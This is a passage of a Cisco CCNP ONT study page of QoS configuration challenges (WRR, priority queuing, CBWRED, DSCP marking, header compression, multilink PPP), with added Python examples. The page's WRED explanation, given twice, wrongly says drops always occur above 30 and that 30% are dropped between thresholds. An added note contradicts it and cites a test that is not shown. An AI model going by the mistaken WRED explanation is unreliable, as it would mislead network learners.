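    print(allocate_bandwidth(1544, [("VOIP", "remaining", 60), ("DATA", "remaining", 40)]))
    # Challenge 156: LLQ plus a fixed-kbps class on a 10 Mbps Ethernet.
    print(allocate_bandwidth(10000, [("VOIP", "priority", 50), ("DATA", "bandwidth", 50)]))
```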

Cisco Switch Challenge 69


Outline
This challenge involves the configuration of Weighted RR (WRR).
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives
The objectives of this challenge are to:

Enable QoS globally (mls qos).


Define Layer 3 operation (no switchport).
Define WRR.

Example
> en
# config t
(config)# mls qos
(config)# int fa0/1
(config-if)# no switchport
(config-if)# mls ?
qos  qos command keyword
(config-if)# mls qos ?
cos            Configure interface COS parameters
dscp-mutation  Apply DSCP-DSCP map to DSCP trusted port
monitor        Collect QoS statistics
trust          Configure trust state of interface
(config-if)# mls qos trust ?
cos            Classify by packet COS
device         trusted device class
dscp           Classify by packet DSCP
ip-precedence  Classify by packet IP precedence
<cr>
(config-if)# mls qos trust cos
(config-if)# priority-queue ?
out  egress priority queue
(config-if)# priority-queue out
(config-if)# wrr-queue ?
bandwidth    Configure WRR bandwidth
cos-map      Configure cos-map for a queue id
min-reserve  Configure min-reserve level
(config-if)# wrr-queue bandwidth ?
<1-65536> enter bandwidth weight for qid 1
(config-if)# wrr-queue bandwidth ANY ?
<1-65536> enter bandwidth weight for qid 2
(config-if)# wrr-queue bandwidth ANY ANY ?
<1-65536> enter bandwidth weight for qid 3
(config-if)# wrr-queue bandwidth ANY ANY ANY ?
<1-65536> enter bandwidth weight for qid 4
(config-if)# wrr-queue cos-map ?
<1-4> enter cos-map queue id
(config-if)# wrr-queue cos-map 1 ?
<0-7> 8 cos values separated by spaces
(config-if)# wrr-queue cos-map 1 0 1 2 4
(config-if)# wrr-queue cos-map 3 4 5

Cisco Router Challenge 157


Outline
This challenge involves the configuration of PQ.
> CCNP ONT Area: Unit 4: Congestion Management and Queuing
Objectives
The objectives of this challenge are to:

Define PQ.
Apply priority-list onto an interface.

Example
> en
# config t
(config)# priority-list ?
<1-16> Priority list number
(config)# priority-list 1 ?
default      Set priority queue for unspecified datagrams
interface    Establish priorities for packets from a named interface
protocol     priority queueing by protocol
queue-limit  Set queue limits for priority queues
(config)# priority-list 1 queue-limit ?
<0-32767> High limit
(config)# priority-list 1 queue-limit 10 ?
<0-32767> Medium limit
(config)# priority-list 1 queue-limit 10 20 ?
<0-32767> Normal limit
(config)# priority-list 1 queue-limit 10 20 30 ?
<0-32767> Lower limit
(config)# priority-list 1 queue-limit 10 20 30 40
(config)# int e0
(config-if)# priority-group 1

Cisco ONT Test Unit 4


Key facts
Unit 4: Congestion Management and Queuing
Not available on this version.

Cisco Router Challenge 158


Outline
This challenge involves the configuration of CBWRED.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency
Mechanisms
Objectives
The objectives of this challenge are to:

Define CBWRED

Example
> en
# config t
(config)# class-map VOIP
(config-cmap)# match ?
access-group         Access group
any                  Any packets
class-map            Class map
cos                  IEEE 802.1Q/ISL class of service/user priority values
destination-address  Destination address
discard-class        Discard behavior identifier
dscp                 Match DSCP in IP(v4) and IPv6 packets
fr-de                Match on Frame-relay DE bit
fr-dlci              Match on fr-dlci
input-interface      Select an input interface to match
ip                   IP specific values
mpls                 Multi Protocol Label Switching specific values
not                  Negate this match result
packet               Layer 3 Packet length
precedence           Match Precedence in IP(v4) and IPv6 packets
protocol             Protocol
qos-group            Qos-group
source-address       Source address
(config-cmap)# match ip ?
dscp        Match IP DSCP (DiffServ CodePoints)
precedence  Match IP precedence
rtp         Match RTP port nos
(config-cmap)# match ip p ?
<0-7>           Enter up to 4 precedence values separated by white-spaces
critical        Match packets with critical precedence (5)
flash           Match packets with flash precedence (3)
flash-override  Match packets with flash override precedence (4)
immediate       Match packets with immediate precedence (2)
internet        Match packets with internetwork control precedence (6)
network         Match packets with network control precedence (7)
priority        Match packets with priority precedence (1)
routine         Match packets with routine precedence (0)
(config-cmap)# match ip precedence 3 4
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match ip precedence 1 2
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# random-detect ?
dscp                            parameters for each dscp value
dscp-based                      Enable dscp-based WRED as drop policy
exponential-weighting-constant  weight for mean queue depth calculation
prec-based                      Enable precedence-based WRED as drop policy
precedence                      parameters for each precedence value
<cr>
(config-pmap-c)# random-detect
(config-pmap-c)# random-detect prece ?
<0-7>  IP precedence
rsvp   rsvp traffic
(config-pmap-c)# random-detect prece 3 ?
<1-4096> minimum threshold (number of packets)
(config-pmap-c)# random-detect prece 3 10 ?
<1-4096> maximum threshold (number of packets)
(config-pmap-c)# random-detect prece 3 10 20 ?
<1-65535> mark probability denominator
<cr>
(config-pmap-c)# random-detect precedence 3 10 20 30
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# bandwidth 50
(config-pmap-c)# exit
(config-pmap)# class class-default
(config-pmap-c)# fair-queue
(config-pmap-c)# random-detect
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

This is CBWRED (Class-based Weighted Random Early Detection), where:

Minimum threshold. When the queue is less than this value, no packets are dropped.
Maximum threshold. When the queue is greater than this value, all packets are dropped.
Mark probability denominator. When the queue is between the minimum and maximum threshold values, packets are dropped based on this probability.

Thus:
(config-pmap-c)# random-detect precedence 3 10 20 30

Will not drop until there is a queue of 10, and will always drop when the queue is over 30.
In-between 10 and 20, it will drop 30% of packets.
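Added example (mine, not NetworkSims'): the three random-detect parameters above worked through in Python, for both the precedence form here and the DSCP form of the next challenge. The mark probability denominator N is the fraction of packets dropped when the average queue depth sits at the maximum threshold, one in N, with the probability rising linearly from zero at the minimum threshold; above the maximum threshold everything is dropped. WRED compares its thresholds with an exponentially weighted average of the queue depth (weight 2^-n, n being the exponential-weighting-constant, IOS default 9), so the simulate and samples_to_reach helpers, hypothetical names, show how slowly a short burst moves that average.

```python
def wred_drop_probability(avg_depth, min_th, max_th, denominator):
    """Drop probability of one WRED profile
    (random-detect precedence|dscp <value> <min> <max> <denominator>)
    at a given average queue depth: 0 below min_th, rising linearly to
    1/denominator at max_th, and 1 (tail drop) once the average is above max_th."""
    if avg_depth < min_th:
        return 0.0
    if avg_depth > max_th:
        return 1.0
    return (avg_depth - min_th) / float(max_th - min_th) / denominator


def wred_average(prev_avg, current_depth, exp_weight=9):
    """Average queue depth as WRED computes it: an exponentially weighted
    moving average with weight 2^-n, n being the
    exponential-weighting-constant (IOS default 9)."""
    w = 2.0 ** -exp_weight
    return prev_avg * (1.0 - w) + current_depth * w


def simulate(depths, min_th, max_th, denominator, exp_weight=9):
    """Feed a sequence of instantaneous queue depths through the averaging
    and return [(average, drop_probability), ...], one entry per sample."""
    avg, trace = 0.0, []
    for depth in depths:
        avg = wred_average(avg, depth, exp_weight)
        trace.append((round(avg, 3),
                      wred_drop_probability(avg, min_th, max_th, denominator)))
    return trace


def samples_to_reach(target_avg, depth, exp_weight=9):
    """Consecutive samples at a constant queue depth needed for the average
    to climb from 0 to target_avg; None if it never can (depth too low)."""
    if depth <= target_avg:
        return None
    avg, n = 0.0, 0
    while avg < target_avg:
        avg = wred_average(avg, depth, exp_weight)
        n += 1
    return n


if __name__ == "__main__":
    # The profile from the challenge: min 10, max 20, denominator 30.
    for depth in (5, 10, 15, 20, 25):
        print(depth, wred_drop_probability(depth, 10, 20, 30))
    # A queue stuck at 40 packets still needs many samples before the
    # averaged depth crosses the minimum threshold of 10.
    print(samples_to_reach(10, 40))
```

At the maximum threshold of 20 the profile drops one packet in 30 (about 3.3%), not 30%; the 30 in the command is a denominator. The exp_weight=0 case in the test makes the average equal to the instantaneous depth, which is the only situation in which the thresholds apply to the queue length a show command reports.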

Cisco Router Challenge 159


Outline
This challenge involves the configuration of CBWRED (DSCP-based)
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency
Mechanisms
Objectives
The objectives of this challenge are to:

Define CBWRED using DSCP.

See the next challenge for tagging the traffic with the DSCP value.

Example
> en
# config t
(config)# class-map VOIP
(config-cmap)# match ?
access-group         Access group
any                  Any packets
class-map            Class map
cos                  IEEE 802.1Q/ISL class of service/user priority values
destination-address  Destination address
discard-class        Discard behavior identifier
dscp                 Match DSCP in IP(v4) and IPv6 packets
fr-de                Match on Frame-relay DE bit
fr-dlci              Match on fr-dlci
input-interface      Select an input interface to match
ip                   IP specific values
mpls                 Multi Protocol Label Switching specific values
not                  Negate this match result
packet               Layer 3 Packet length
precedence           Match Precedence in IP(v4) and IPv6 packets
protocol             Protocol
qos-group            Qos-group
source-address       Source address
(config-cmap)# match ip ?
dscp        Match IP DSCP (DiffServ CodePoints)
precedence  Match IP precedence
rtp         Match RTP port nos
(config-cmap)# match ip dscp ?
<0-63>   Differentiated services codepoint value
af11     Match packets with AF11 dscp (001010)
af12     Match packets with AF12 dscp (001100)
af13     Match packets with AF13 dscp (001110)
af21     Match packets with AF21 dscp (010010)
af22     Match packets with AF22 dscp (010100)
af23     Match packets with AF23 dscp (010110)
af31     Match packets with AF31 dscp (011010)
af32     Match packets with AF32 dscp (011100)
af33     Match packets with AF33 dscp (011110)
af41     Match packets with AF41 dscp (100010)
af42     Match packets with AF42 dscp (100100)
af43     Match packets with AF43 dscp (100110)
cs1      Match packets with CS1(precedence 1) dscp (001000)
cs2      Match packets with CS2(precedence 2) dscp (010000)
cs3      Match packets with CS3(precedence 3) dscp (011000)
cs4      Match packets with CS4(precedence 4) dscp (100000)
cs5      Match packets with CS5(precedence 5) dscp (101000)
cs6      Match packets with CS6(precedence 6) dscp (110000)
cs7      Match packets with CS7(precedence 7) dscp (111000)
default  Match packets with default dscp (000000)
ef       Match packets with EF dscp (101110)
(config-cmap)# match ip dscp af21 af22 af23 cs2
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match ip dscp af11 af12 af13 cs1
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# random-detect ?
dscp                            parameters for each dscp value
dscp-based                      Enable dscp-based WRED as drop policy
exponential-weighting-constant  weight for mean queue depth calculation
prec-based                      Enable precedence-based WRED as drop policy
precedence                      parameters for each precedence value
<cr>
(config-pmap-c)# random-detect dscp-based
(config-pmap-c)# random-detect dscp ?
<0-63>   Differentiated services codepoint value
af11     Match packets with AF11 dscp (001010)
af12     Match packets with AF12 dscp (001100)
af13     Match packets with AF13 dscp (001110)
af21     Match packets with AF21 dscp (010010)
af22     Match packets with AF22 dscp (010100)
af23     Match packets with AF23 dscp (010110)
af31     Match packets with AF31 dscp (011010)
af32     Match packets with AF32 dscp (011100)
af33     Match packets with AF33 dscp (011110)
af41     Match packets with AF41 dscp (100010)
af42     Match packets with AF42 dscp (100100)
af43     Match packets with AF43 dscp (100110)
cs1      Match packets with CS1(precedence 1) dscp (001000)
cs2      Match packets with CS2(precedence 2) dscp (010000)
cs3      Match packets with CS3(precedence 3) dscp (011000)
cs4      Match packets with CS4(precedence 4) dscp (100000)
cs5      Match packets with CS5(precedence 5) dscp (101000)
cs6      Match packets with CS6(precedence 6) dscp (110000)
cs7      Match packets with CS7(precedence 7) d<br>scp (111000)
default  Match packets with default dscp (000000)
ef       Match packets with EF dscp (101110)
rsvp     rsvp traffic
(config-pmap-c)# random-detect dscp af21 ?
<1-4096> minimum threshold (number of packets)
(config-pmap-c)# random-detect dscp af21 10 ?
<1-4096> maximum threshold (number of packets)
(config-pmap-c)# random-detect dscp af21 10 20 ?
<1-65535> mark probability denominator
<cr>
(config-pmap-c)# random-detect dscp af21 10 20 30
(config-pmap-c)# random-detect dscp af22 10 20 30
(config-pmap-c)# random-detect dscp af23 10 20 30
(config-pmap-c)# random-detect dscp cs2 10 20 30
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# bandwidth 50
(config-pmap-c)# exit
(config-pmap)# class class-default
(config-pmap-c)# fair-queue
(config-pmap-c)# random-detect dscp-based
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

This is CBWRED (Class-based Weighted Random Early Detection), where:

Minimum threshold. When the queue is less than this value, no packets are dropped.
Maximum threshold. When the queue is greater than this value, all packets are dropped.
Mark probability denominator. When the queue is between the minimum and maximum threshold values, packets are dropped based on this probability.

Thus:
(config-pmap-c)# random-detect dscp af21 10 20 30

Will not drop until there is a queue of 10, and will always drop when the queue is over 30.
In-between 10 and 20, it will drop 30% of packets.

Cisco Router Challenge 160


Outline
This challenge involves tagging traffic with the DSCP value.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency
Mechanisms
Objectives
The objectives of this challenge are to:

Identify traffic, and tag.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# set ?
atm-clp        Set ATM CLP bit to 1
cos            Set IEEE 802.1Q/ISL class of service/user priority
discard-class  Discard behavior identifier
dscp           Set DSCP in IP(v4) and IPv6 packets
fr-de          Set FR DE bit to 1
ip             Set IP specific values
mpls           Set MPLS specific values
precedence     Set precedence in IP(v4) and IPv6 packets
qos-group      Set QoS Group
(config-pmap-c)# set ip ?
dscp        Set IP DSCP (DiffServ CodePoint)
precedence  Set IP precedence
(config-pmap-c)# set ip dscp ?
<0-63>   Differentiated services codepoint value
af11     Match packets with AF11 dscp (001010)
af12     Match packets with AF12 dscp (001100)
af13     Match packets with AF13 dscp (001110)
af21     Match packets with AF21 dscp (010010)
af22     Match packets with AF22 dscp (010100)
af23     Match packets with AF23 dscp (010110)
af31     Match packets with AF31 dscp (011010)
af32     Match packets with AF32 dscp (011100)
af33     Match packets with AF33 dscp (011110)
af41     Match packets with AF41 dscp (100010)
af42     Match packets with AF42 dscp (100100)
af43     Match packets with AF43 dscp (100110)
cs1      Match packets with CS1(precedence 1) dscp (001000)
cs2      Match packets with CS2(precedence 2) dscp (010000)
cs3      Match packets with CS3(precedence 3) dscp (011000)
cs4      Match packets with CS4(precedence 4) dscp (100000)
cs5      Match packets with CS5(precedence 5) dscp (101000)
cs6      Match packets with CS6(precedence 6) dscp (110000)
cs7      Match packets with CS7(precedence 7) dscp (111000)
default  Match packets with default dscp (000000)
ef       Match packets with EF dscp (101110)
(config-pmap-c)# set ip dscp 46
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# set ip dscp 10
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Note it is also possible to define:

(config-pmap-c)# set ip dscp ef
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# set ip dscp af11
(config-pmap-c)# exit

which is the same as above.


For end-to-end QoS, the tagging is done at the first router which connects to the source of
the traffic. In this way, all the devices on the way will read the DSCP tag, and route with the
required QoS.

Cisco Router Challenge 161


Outline
This challenge involves tagging traffic with the Precedence value.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency
Mechanisms
Objectives
The objectives of this challenge are to:

Identify traffic, and tag.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# set ?
atm-clp
Set ATM CLP bit to 1
cos
Set IEEE 802.1Q/ISL class of service/user priority
discard-class Discard behavior identifier
dscp
Set DSCP in IP(v4) and IPv6 packets
fr-de
Set FR DE bit to 1
ip
Set IP specific values
mpls
Set MPLS specific values
precedence
Set precedence in IP(v4) and IPv6 packets
qos-group
Set QoS Group
(config-pmap-c)# set ip ?
dscp
Set IP DSCP (DiffServ CodePoint)
precedence Set IP precedence
(config-pmap-c)# set ip prec ?
<0-7>
IP precedence
<0-7>
Precedence value
critical
Set packets with critical precedence (5)
flash
Set packets with flash precedence (3)
flash-override Set packets with flash override precedence (4)
immediate
Set packets with immediate precedence (2)
internet
Set packets with internetwork control precedence (6)
network
Set packets with network control precedence (7)

priority
Set packets with priority precedence (1)
routine
Set packets with routine precedence (0)
(config-pmap-c)# set ip prec 5
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# set ip prec 1
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Note it is also possible to define:


(config-pmap-c)# set ip precedence critical
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# set ip precedence priority
(config-pmap-c)# exit

which is the same as above.
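As an added example (not part of the NetworkSims challenge text), the following Python resolves the DSCP and precedence keywords used by the two marking challenges above to their bit values and checks the equivalences they rely on: EF is DSCP 46 with precedence 5 (critical), and the IOS keyword for DSCP 10 is af11. The helper functions are written here for illustration only.

```python
# Added illustration of the ToS-byte arithmetic behind "set ip dscp" and
# "set ip precedence"; these helpers are not IOS code and not from the page.

PRECEDENCE_NAMES = {
    0: "routine", 1: "priority", 2: "immediate", 3: "flash",
    4: "flash-override", 5: "critical", 6: "internet", 7: "network",
}
PRECEDENCE_VALUES = {name: value for value, name in PRECEDENCE_NAMES.items()}


def dscp_from_keyword(word):
    """Resolve an IOS DSCP keyword (ef, cs0-cs7, af11-af43, default) or a
    decimal 0-63 to the six-bit DSCP value."""
    w = word.strip().lower()
    if w.isdigit():
        value = int(w)
        if not 0 <= value <= 63:
            raise ValueError("DSCP must be 0-63")
        return value
    if w == "default":
        return 0
    if w == "ef":
        return 0b101110                        # 46, expedited forwarding
    if len(w) == 3 and w.startswith("cs") and w[2].isdigit():
        return int(w[2]) << 3                  # class selector: precedence in the top three bits
    if len(w) == 4 and w.startswith("af") and w[2:].isdigit():
        cls, drop = int(w[2]), int(w[3])
        if not (1 <= cls <= 4 and 1 <= drop <= 3):
            raise ValueError("assured forwarding classes are af11 .. af43")
        return (cls << 3) | (drop << 1)        # AFxy = 8x + 2y
    raise ValueError(f"unknown DSCP keyword {word!r}")


def precedence_from_keyword(word):
    """Resolve an IOS precedence keyword (critical, priority, ...) or 0-7."""
    w = word.strip().lower()
    if w.isdigit():
        value = int(w)
        if not 0 <= value <= 7:
            raise ValueError("precedence must be 0-7")
        return value
    if w in PRECEDENCE_VALUES:
        return PRECEDENCE_VALUES[w]
    raise ValueError(f"unknown precedence keyword {word!r}")


def precedence_of_dscp(dscp):
    """The precedence a precedence-only device reads from a DSCP-marked packet."""
    return dscp >> 3


def tos_byte(dscp, ecn=0):
    """Assemble the IP ToS/traffic-class byte: DSCP in bits 7..2, ECN in bits 1..0."""
    return (dscp << 2) | (ecn & 0b11)


def describe(dscp):
    """Human-readable view, e.g. 46 -> 'dscp 46 (101110), precedence 5 (critical)'."""
    prec = precedence_of_dscp(dscp)
    return f"dscp {dscp} ({dscp:06b}), precedence {prec} ({PRECEDENCE_NAMES[prec]})"


def same_marking(dscp_word, precedence_word):
    """True when 'set ip dscp <dscp_word>' and 'set ip precedence <precedence_word>'
    leave the same value in the three precedence bits."""
    return precedence_of_dscp(dscp_from_keyword(dscp_word)) == precedence_from_keyword(precedence_word)


if __name__ == "__main__":
    for word in ("ef", "cs5", "af11", "46", "default"):
        print(f"{word:>7}: {describe(dscp_from_keyword(word))}")
```

Because any host can write its own DSCP, the edge router re-marks rather than trusting the incoming value, which is why the text places the tagging on the first router.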


For end-to-end QoS, the tagging is done at the first router which connects to the source of
the traffic. In this way, all the devices on the way will read the DSCP tag, and route with the
required QoS.

Cisco Router Challenge 162


Outline
This challenge involves compressing the RTP header on a serial interface.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency Mechanisms
Objectives
The objectives of this challenge are to:

Define RTP header compression.

Example
> en
# config t
(config)# int e0
(config-if)# ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets

accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
audit
Apply IDS audit name
auth-proxy
Apply authenticaton proxy
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Fowarding interface commands
cgmp
Enable/disable CGMP
dhcp
Configure DHCP parameters for this interface
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
flow
NetFlow related commands
header-compression IPHC options
hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
idle-group
Specify interesting packets for idle-timer
igmp
IGMP interface commands
information-reply
Enable sending ICMP Information Reply messages
inspect
Apply inspect name
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
local-proxy-arp
Enable local-proxy ARP
mask-reply
Enable sending ICMP Mask Reply messages
mobile
Mobile IP support
mrm
Configure IP Multicast Routing Monitor tester
mroute-cache
Enable switching cache for incoming multicast packets
mtu
Set IP Maximum Transmission Unit
multicast
IP multicast interface commands
nat
NAT interface commands
nbar
Network-Based Application Recognition
next-hop-self
Configures IP-EIGRP next-hop-self
nhrp
NHRP interface subcommands
ospf
OSPF interface commands
pgm
PGM Reliable Transport Protocol
pim
PIM interface commands
policy
Enable policy routing
proxy-arp
Enable proxy ARP
rarp-server
Enable RARP server for static arp entries
redirects
Enable sending ICMP Redirect messages
rgmp
Enable/disable RGMP
rip
Router Information Protocol
route-cache
Enable fast-switching cache for outgoing packets
router
IP router interface commands
rsvp
RSVP Interface Commands
rtp
RTP parameters
sap
Session Announcement Protocol interface commands
security
DDN IP Security Option
split-horizon
Perform split horizon
summary-address
Perform address summarization
tcp
TCP header compression and other parameters
unnumbered
Enable IP processing without an explicit address
unreachables
Enable sending ICMP Unreachable messages
urd
Configure URL Rendezvousing
verify
Enable per packet validation
vrf
VPN Routing/Forwarding parameters on the interface
wccp
WCCP interface commands
(config-if)# ip rtp ?
compression-connections Maximum number of compressed connections
header-compression
Enable RTP header compression
priority
Assign a priority queue for RTP streams
reserve
Assign a reserved queue for RTP streams

(config-if)# ip rtp header-compression


(config-if)# encapsulation ppp
(config-if)# ip rtp compression-connections ?
<3-1000> Number of connections
(config-if)# ip rtp compression-connections 20

Cisco Router Challenge 163


Outline
This challenge involves compressing the RTP header for a frame relay connection.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency Mechanisms
Objectives
The objectives of this challenge are to:

Define RTP header compression for a frame-relay connection.

Example
> en
# config t
(config)# int s0
(config-if)# encapsulate ?
atm-dxi
ATM-DXI encapsulation
frame-relay Frame Relay networks
hdlc
Serial HDLC synchronous
lapb
LAPB (X.25 Level 2)
ppp
Point-to-Point protocol
smds
Switched Megabit Data Service (SMDS)
x25
X.25
(config-if)# encapsulate frame-relay
(config-if)# clock ?
rate Configure serial interface clock speed
(config-if)# clock rate ?
Speed (bits per second)
1200
2400
4800
9600
14400
19200
28800
32000
38400
56000
57600
64000
72000

115200
125000
128000
148000
192000
250000
256000
384000
500000
512000
768000
800000
1000000
1300000
2000000
4000000
8000000
<300-4000000>
Choose clockrate from list above
(config-if)# clock rate 1200
(config-if)# frame-relay ?
accounting
Special accounting instruction
address-reg
ELMI address registration
broadcast-queue
Define a broadcast queue and transmit rate
class
Define a map class on the interface
congestion-management Enable Frame Relay congestion management
de-group
Associate a DE group with a DLCI
fragment
Enable end-to-end fragmentation for all PVCs
fragmentation
Adaptive fragmentation
ifmib-counter64
Support IF-MIB's total packet/byte counts of Counter64
on FR if/subif when main interface's ifSpeed < 20 Mbps
interface-dlci
Define a DLCI on an interface/subinterface
interface-queue
configure PVC interface queueing
intf-type
Configure a FR DTE/DCE/NNI interface
inverse-arp
Enable/disable FR inverse ARP
ip
Frame Relay Internet Protocol config commands
lmi-n391dte
set full status polling counter
lmi-n392dce
LMI error threshold
lmi-n392dte
LMI error threshold
lmi-n393dce
set LMI monitored event count
lmi-n393dte
set LMI monitored event count
lmi-t392dce
set DCE polling verification timer
lmi-type
Use CISCO-ANSI-CCITT type LMI
local-dlci
Set source DLCI when LMI is not supported
map
Map a protocol address to a DLCI address
multicast-dlci
Set DLCI of a multicast group
policing
Enable Frame Relay policing
priority-dlci-group
Define a priority group of DLCIs
qos-autosense
enable QOS autosense
route
frame relay route for pvc switching
traffic-shaping
Enable Frame Relay Traffic Shaping
traps-maximum
set max traps FR generates at link up or when getting
LMI Full Status message
(config-if)# frame-relay map ?
bridge Bridging
bstun
Block Serial Tunnel
dlsw
Data Link Switching (Direct encapsulation only)
ip
IP
ipv6
IPV6
llc2
llc2
pppoe
PPP over Ethernet
qllc
qllc protocol

rsrb Remote Source-Route Bridging
stun Serial Tunnel
(config-if)# frame-relay map ip ?
A.B.C.D Protocol specific address
(config-if)# frame-relay map ip 1.2.3.4 ?
<16-1007> DLCI
(config-if)# frame-relay map ip 1.2.3.4 111 ?
broadcast
Broadcasts should be forwarded to this address
cisco
Use CISCO Encapsulation
compress
Enable TCP/IP and RTP/IP header compression
ietf
Use RFC1490/RFC2427 Encapsulation
nocompress
Do not compress TCP/IP headers
payload-compression Use payload compression
rtp
RTP header compression parameters
tcp
TCP header compression parameters
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast ?
cisco
Use CISCO Encapsulation
compress
Enable TCP/IP and RTP/IP header compression
ietf
Use RFC1490/RFC2427 Encapsulation
nocompress
Do not compress TCP/IP headers
payload-compression Use payload compression
rtp
RTP header compression parameters
tcp
TCP header compression parameters
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast rtp ?
header-compression Enable RTP/IP compression
(config-if)# frame-relay map ip 1.2.3.4 111 broadcast rtp header-compression ?
active
Always compress RTP headers
connections Maximum number of compressed RTP connections
passive
Compress for destinations sending compressed RTP headers
<cr>
(config-if)# frame-relay map ip 1.2.3.4 111 b r header-compression

Cisco Router Challenge 164


Outline
This challenge involves compressing the TCP header on an Ethernet interface.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency Mechanisms
Objectives
The objectives of this challenge are to:

Define TCP header compression.

Example
> en
# config t
(config)# int e0
(config-if)# ip tcp ?
adjust-mss
Adjust the mss of transit packets
compression-connections Maximum number of compressed connections
header-compression
Enable TCP header compression
(config-if)# ip tcp header-compression
(config-if)# ip tcp compression-connections ?
<3-256> Number of connections
(config-if)# ip tcp compression-connections 20
(config-if)# ip tcp header-compression

Cisco Router Challenge 165


Outline
This challenge involves multilink PPP (MLP) and link fragmentation and interleaving (LFI).
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency Mechanisms
Objectives
The objectives of this challenge are to:

Define a Dialer group.


Define MLP and LFI.
Apply to the BRI interface.

Example

> en
# config t
(config)# int dialer0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# description test link
(config-if)# encapsulation ppp
(config-if)# ppp ?
accm
Set initial Async Control Character Map
accounting
Set PPP network accounting method
acfc
Options for HDLC Address & Control Field Compression
authentication Set PPP link authentication method
authorization
Set PPP network authorization method
bridge
Enable PPP bridge translation

caller Caller option when no CLID is available
chap Set CHAP authentication parameters
direction Override default PPP direction
dnis Authentication via DNIS before LCP
eap Set EAP authentication parameters
encrypt Enable PPP encryption
ipcp Set IPCP negotiation options
iphc Set IPCP Header Compression control options
lcp PPP LCP configuration
link Set miscellaneous link parameters
loopback PPP loopback options
max-bad-auth Allow multiple authentication failures
max-configure Number of conf-reqs sent before assuming peer is unable to respond
max-failure
Number of conf-naks sent before assuming configuration is not
converging
max-terminate
Number of term-reqs sent before assuming peer is unable to
respond
ms-chap
Set MS-CHAP authentication parameters
ms-chap-v2
Set MS-CHAP-V2 authentication parameters
multilink
Make interface multilink capable
pap
Set PAP authentication parameters
pfc
Options for Protocol Field Compression
quality
Set parameters related to Link Quality Monitoring (LQM)
reliable-link
Use LAPB with PPP to provide a reliable link
timeout
Set PPP timeout parameters
Router(config-if)# ppp authe ?
chap
Challenge Handshake Authentication Protocol (CHAP)
eap
Extensible Authentication Protocol (EAP)
ms-chap
Microsoft Challenge Handshake Authentication Protocol (MS-CHAP)
ms-chap-v2 Microsoft CHAP Version 2 (MS-CHAP-V2)
pap
Password Authentication Protocol (PAP)
(config-if)# ppp authentication chap
(config-if)# dialer remote-name temp
(config-if)# dialer idle-timeout 100
(config-if)# dialer fast-idle 80
(config-if)# dialer string 2221111
(config-if)# dialer pool 1
(config-if)# dialer-group 1
(config-if)# ppp multilink
(config-if)# ppp multilink ?
bap
Enable BACP/BAP bandwidth allocation negotiation
fragment-delay Specify the maximum delay for each fragment
fragmentation
Enable/Disable multilink fragmentation
idle-link
Do not transmit fragments over the lowest speed link
interleave
Allow interleaving of small packets with fragments
<cr>
(config-if)# ppp multilink
(config-if)# ppp multilink interleave
(config-if)# ppp mu fragment-delay ?
<1-1000> Maximum delay in milliseconds
(config-if)# ppp multilink fragment-delay 20
(config-if)# exit
(config)# int bri0
(config-if)# dialer pool-member 1

Cisco Router Challenge 166


Outline
This challenge involves the policing of VoIP traffic for average bit rate and burst parameters.
Objectives
The objectives of this challenge are to:

Define an ACL for VoIP (SIP).


Define QoS on VoIP traffic.
Define bit rate and a burst rate for the VoIP traffic.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 560
(config)# access-list 100 permit udp any any eq 560
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# policy-map NEW
